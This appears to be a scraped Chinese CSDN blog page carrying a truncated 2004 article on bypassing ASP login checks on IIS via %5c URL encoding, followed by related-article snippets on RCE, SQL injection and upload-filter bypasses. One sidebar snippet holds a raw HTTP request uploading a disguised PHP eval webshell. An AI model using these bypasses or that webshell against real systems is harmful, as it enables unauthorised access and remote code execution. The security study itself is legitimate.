利用%5c绕过验证

最新推荐文章于 2025-04-08 08:00:00 发布
原创 最新推荐文章于 2025-04-08 08:00:00 发布 · 2.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#c #数据库 #iis #microsoft #user #url

本文探讨了如何利用%5c字符绕过ASP的验证过程,通过分析包含%5c的URL如何影响IIS和数据库连接,揭示了一个可能的安全漏洞。当提交包含%5c的URL时,可能导致数据库文件无法找到,从而利用容错机制绕过验证。作者通过实例展示了如何修改登录页面的URL并使用空格作为用户名和密码,以绕过某些系统的验证。文章还提到了成功利用此方法的条件,包括相对路径的数据库连接、简单的错误处理、特定的IIS版本和程序对空字符的处理。最后,作者提出了相应的防范措施。

利用%5c绕过验证

---------------------------------------
lake2(http://mrhupo.126.com)
2004-11-27
---------------------------------------

说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^_^)。

好,我们先追根溯源,找到那个漏洞的老底。看看绿盟2001年的漏洞公告:http://www.nsfocus.net/index.php?ac...iew&bug_id=1429

N年以前利用这个漏洞可以实现目录遍历,虽然微软出了补丁,不过好像补丁是用来限制iis只能访问虚拟目录的,所以漏洞还是存在,只不过利用方式变了。对iis来说,提交一个含有%5c的url能够找到文件,但是该文件里以相对路径引用的其他文件却找不到了(%5c是/的url编码,iis跳转到上一级目录去找,当然找不到;头晕了吧,哈哈,我也头晕啊)。

后来这个漏洞就被牛人挖掘出来了,也就是传说中的%5c暴库:由于连接数据库的文件引用的相对路径,提交%5c找不到文件,所以导致出错,iis就会老老实实的说出数据库的路径(不明白?找google)。

一个偶然的机会我发现还可以利用%5c绕过asp的验证;当我们暴库失败的时候不妨试试。

废话少说,看下面的代码:

<!--#INCLUDE file="conn.asp" --&g

最低0.47元/天 解锁文章
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
weixin_45534587的博客
02-09 1115
RCE,全称 Remote Code Execution,也就是远程代码执行。简单来说,它是一种非常危险的安全漏洞。正常情况下,我们访问一个网站或者使用某个应用程序,只能按照开发者设定好的功能来操作。但要是存在 RCE 漏洞,攻击者就能打破这种限制,在目标服务器上执行他们自己编写的代码。
ASP程序密码验证漏洞
weifeng_nuaa的专栏
07-18 508
这个漏洞其实是很多网站都存在的,特别是提供用ASP编写的聊天室,BBS等(其它的语言我不懂,但我想也会存在这方面的洞的。)。   一般来说,我们在验证用户是否合法时,会用如下的语句:   set db=server.CreateObject("ADOdb.recordset")   sqlstr=select * from table where user="&request("
实现网页密码验证的两个基本方法
网络文档(Lonz)
08-07 3488
我们在访问一些网站时,经常会碰到需要输入“用户名和密码”的网页,用户名和密码的验证给网站的安全来保障,一般网页的安全设置以目录为单位,通过设置目录的属性可以保证网站的安全,这样的网页是如何制作出来的呢?  下面笔者将介绍在网页设计中密码验证的两种方法,希望能给网页设计者有所帮助。   一、使用IIS所提供的工具   如果设计者是管理员级的用户,我们可以用一种简单的方法来实现密码验证。假设你安
使用“\“绕过文件上传限制小技巧
Websec
05-27 999
参考文章:记一次 Tomcat 部署 WAR 包拦截绕过的深究 - 勿忘初心 - Ch1ng's Blog 1、使用Tomcat 处理会忽略 \ 的情况,javasec园长提到的是 org.apache.tomcat.util.http.parser.HttpParser#unquote 方法会处理文件名中的 ",方法是见到双引号后直接字符串长度 -1,然后我们可以使用\去绕过文件上传后缀名检测限制,实现getshell。 2、成功绕过上传jsp文件 ...
解决URL网址中遇到%2F或%5C(正反斜杠)等特殊符号导致URL重写失效出现404的问题...
liNewman的博客
05-09 9969
解决URL网址中遇到%2F或%5C(正反斜杠)等特殊符号导致URL重写失效出现404的问题 在使用Apache地址重写mod_rewrite期间,发现,当URL和PATH_INFO中出现/(/)或者\(\), 会被认为这是个不合法的请求, Apache将会直接返回"404 (Not Found)"错误。 也就是说,Apache在调用 mo...
POST /file-ajaxUpload-6895631d018d8.html?dir=image HTTP/1.1 Host: 10.10.10.10 Content-Length: 341 Cache-Control: max-age=0 Accept-Language: en-US,en;q=0.9 Origin: http://10.10.10.10 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY5wFSk8xBmgB03g1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://10.10.10.10/product-create-6.html Accept-Encoding: gzip, deflate, br Cookie: lang=zh-cn; device=desktop; theme=default; zentaosid=9f7d62118a2704cbf034cd5446527d2e; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; lastProject=7; lastProgram=6; preProductID=4; storyModule=0; storyBranch=all; treeBranch=all; productStoryOrder=id_desc; branchSourceName=%E6%89%80%E5%B1%9E; branchName=; lastStoryModule=0; lastTaskModule=2; preBranch=0; windowWidth=1504; windowHeight=1130; tab=product; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F10.10.10.10%5C%2Fexecution-task.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F10.10.10.10%5C%2Fcompany-browse.html%22%2C%22program%22%3A%22http%3A%5C%2F%5C%2F10.10.10.10%5C%2Fprogram-browse.html%22%2C%22product%22%3A%22http%3A%5C%2F%5C%2F10.10.10.10%5C%2Fproduct-all.html%22%7D Connection: keep-alive ------WebKitFormBoundaryY5wFSk8xBmgB03g1 Content-Disposition: form-data; name="localUrl" C:\fakepath\shell1.php.png ------WebKitFormBoundaryY5wFSk8xBmgB03g1 Content-Disposition: form-data; name="imgFile"; filename="shell1.php.png" Content-Type: image/png <?php eval($_POST["pass"]); ------WebKitFormBoundaryY5wFSk8xBmgB03g1-- 如何在这个上面构建index。php
最新发布
08-09
为了绕过服务器对文件扩展名的检测,攻击者通常会使用多种绕过技巧: - **文件扩展名混淆**:使用服务器允许的扩展名(如 `.png`、`.jpg`)上传恶意文件,再通过 `.htaccess` 或服务器配置使其被解析为 PHP。 - **...
反序列化漏洞 Waf 绕过技术:解析与执行的认知博弈
syg6921008的博客
04-08 1608
在当前的安全攻防实践中,针对反序列化漏洞的 WAF 检测机制仍存在诸多盲区与不完善之处。为了更深入地理解其绕过方式,我查阅了大量公开研究、实战案例与工具源码,并系统性地梳理出了9 类典型的反序列化漏洞 WAF 绕过技术策略。“在不被识别为恶意的前提下,如何让 payload 既具备混淆性,又能精准执行?WAF 绕过从来不只是编码和隐藏,更是一种关于解析、执行路径与安全策略认知的博弈。希望本文的内容,能为你的实战思路来一些启发。💡。
文件上传绕过方法汇总
xiaoheizi的博客
06-12 9697
先上传1.php,它的目的是让服务器上的php来创建一个2.php,我们在1.php被删除之前访问到他,就可以在服务器中创建2.php,2.php是一个木马文件,但是这个是系统自身创建的,所以不会被删除。假如我不断的上传发包,然后我同时也不断的访问那个我们上传上去的文件的地址,我们就开始和服务器的函数比手速了,函数执行都是要时间的,如果我这边上传上去,且没有删除,那个时间可能很短,然后被我访问到了,岂不是就可以执行PHP了。
URL编码
野原新之助
01-22 1326
URL编码,是指对URL(统一资源定位符)中出现的一些特殊字符进行编码,使其能够符合传输要求。 由于URL中只支持数字和字母,因此当一些网络资源的路径包含特殊字符(如汉子、符号)时,就需要对其进行URL编码,由于其编码方式的特点,URL编码也被称为百分号编码。 编码方式: 对特殊字符,在其 ascii 的16进制格式前加上百分号,就是URL编码。 例如:反斜杠 \ 的 ascii 码是 92,92...
sql注释符注入防御_SQL注入防御绕过的一些沉淀
weixin_39620535的博客
12-20 368
一、宽字节注入1、什么是宽字节GB2312、GBK、GB18030、BIG5等这些都是常说的宽字节,实际为两字节2、宽字节注入原理防御:将 ' 转换为 \'绕过:将 \ 消灭mysql在使用GBK编码的时候,会认为两个字符为一个汉字\ 编码为 %5c' 编码为%27%df%5c mysql会认为是一个汉字构造:%df' %df\' %df%5c%27 其中%df%5c将成为一个汉字专为 ...
【SQL注入-绕过篇】
m0_62373986的博客
08-29 2004
绕过\的关键点在于网站在对输入数据进行处理时,只进行了一次URL编码,所以将%25转化成%后,不会再检查后面的%27。1、宽字节注入在上一篇博客讲到,是因%df+%5c结合为一个宽字节因为GBK编码组合成一个汉字,从而使\失效。2、除此之外,若\没有被网站过滤,也可以利用\对字符的转义来进行SQL注入。网站初次检测用户输入%2527,因为URL编码将%25转化成%,此时用户输入未检测到特殊字符,直接将%27输入到数据库中。2、若\没有被过滤,使用\令闭合符失效。1、宽字节绕过(%df%5c)
正则绕过总结
qq_40327508的博客
09-28 8508
换行符绕过(%0a) <?php include("flag.php"); highlight_file(__FILE__); $c = $_GET['c']; if (preg_match('/^flag$/i', $c) && $c !== 'flag') { echo $flag; }else{ echo "nonono"; } 2.数组绕过 preg_match只能处理字符串,当传入的subject是数组时会返回false 3.%5c绕过 <?ph.
RCE(远程命令执行)绕过总结
Elite的博客
04-18 5970
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
命令执行RCE及其绕过详细总结(各情景下的绕过
热门推荐
2301_76690905的博客
12-12 1万+
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
RCE漏洞及绕过技巧:从基础到高级实战攻略
2301_79469341的博客
12-06 1386
例:scandir(‘.’)能返回当前目录,虽然无法传参,但可以利用localeconv()返回. 并且用current()取第一个值实现,即用current(localeconv())构造一个点.此时flag.php位置较靠后,用array_reverse将数组反转,然后用next选择第二个即flag.php,然后读取flag.php文件。先利用current将localeconv中的.取出来,然后用scandir返回当前目录中的文件和子目录,得到当前flag在flag.php。php> <?
%5C暴库原理
Post Due To Vacuity
07-24 4197
暴库有两个方法,第一个就是利用%5c,另外一个conn.asp暴库。而且这里的暴库是针对access数据库的,而和access搭配的脚本一般是asp,因此出现暴库的一般为asp类型站点。   ASP是动态服务器页面(Active Server Pages)的英文缩写,后来也称为经典ASP,是微软公司开发的代替CGI脚本程序的一种应用,也是微软公司的第一个服务器侧的脚本引擎,能够动态产生Web
命令执行各种绕过总结
m0_64815693的博客
10-11 1万+
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
网络安全——绕过
W981113的博客
01-01 4307
1.编码的问题 http在传输特殊字符时需要在浏览器中编码,常见的比如空格、回车符等 编码是有规定的,但是具体如何编码没有规定,不同浏览器编码方案不一致,不同字段编码方案也不一样 结论:所有浏览器都有编码的习惯,那么后台接收数据时。首先需要处理编码就是解码,解码是把已编码的字符还原,其余未编码的不动。 2.实际测试 当对浏览器的输入区域进行输入字符时会出现两种情况: 1.输入的字段被浏览器自动编码,例如输入空格,浏览器自动编码为%20,传输时http中也是%20形式传输的 2.输入的字段是编码形式,浏览器自
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值